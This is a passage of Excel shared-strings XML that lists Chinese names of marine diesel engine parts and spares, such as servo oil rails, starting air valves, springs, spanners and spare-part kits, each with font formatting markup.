      <t>气缸润滑油伺服油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油共轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油轨安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油轨加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油轨压力试验图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油服务泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封条</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带止点定位螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油轨指导和附件数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴接地装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴轴角度编码器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴轴角度编码器安装布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固螺栓轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴颈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向轴销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴润滑器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向轴销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮轴销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板金件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳式棘轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用起重机吊钩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提交试验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急停车组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车台应急停车组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气截止阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左边板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右边板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>视流器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器剖视图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单钩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>栏杆插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸肩套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽沉头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集油桶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击环形扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击扳手套圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丝座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外六角扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件订货</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁浮动开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>噪音与热绝缘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两片式隔音材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铲形插口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件箱</t>
    </r>
  </si>
  <si>
    <r>
      <t>30</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升备件箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警系统备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自清滤器备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机开关箱备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑单元备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀备件</t>
    </r>
  </si>
  <si>
    <r>
      <t>FLEX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油轨备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件组</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特质钥匙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用试压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动试压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用锁紧钢丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范和说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球形滚珠轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球形圆螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球面垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡油板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海棉橡胶圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带油管的喷射板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性定位销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧导杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加载臂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性张紧器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加载杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>正齿轮葫芦吊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分配器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支柱组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机参数</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄油罐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油服务泵启动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气管总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶升螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气阀不带垫片和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>斯德福管夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>撑管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢球</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
